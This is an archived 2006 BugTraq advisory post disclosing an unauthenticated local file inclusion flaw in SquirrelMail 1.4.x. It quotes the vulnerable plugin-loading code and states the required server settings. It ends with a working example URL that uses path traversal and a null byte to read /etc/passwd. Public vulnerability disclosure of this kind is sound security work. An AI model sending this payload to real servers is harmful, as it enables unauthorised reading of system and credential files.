BugTraq
Squirrelmail local file inclusion Jun 01 2006 12:50AM
brokejunker yahoo com (1 replies)
Squirrelmail local file inclusion bug in functions/plugin.php .

Tested on the latest 1.4.x version.

No authentication needed.

if (isset($plugins) && is_array($plugins)) {

foreach ($plugins as $name) {

use_plugin($name);

}

...

function use_plugin ($name) {

if (file_exists(SM_PATH . "plugins/$name/setup.php")) {

include_once(SM_PATH . "plugins/$name/setup.php");

$function = "squirrelmail_plugin_init_$name";

if (function_exists($function)) {

$function();

}

}

}

....

If register_globals is on we can control the $name variable.

In order to avoid errors SM_PATH needs to be defined. Exploitation

is done through src/redirect.php ( it includes functions/plugin.php

prior to authentication and it defines SM_PATH ).

magic_quotes_gpc needs to be off.

Example:

http://[host]/[squirrelmail dir]/src/redirect.php?plugins[]=../../../../etc/passwd%00

Denix Solutions

Unix/Linux Solutions for your Business

http://www.denixsolutions.com

[ reply ]
Re: Squirrelmail local file inclusion Jun 02 2006 04:21AM
Paul Schmehl (pauls utdallas edu)


 

Privacy Statement
Copyright 2010, SecurityFocus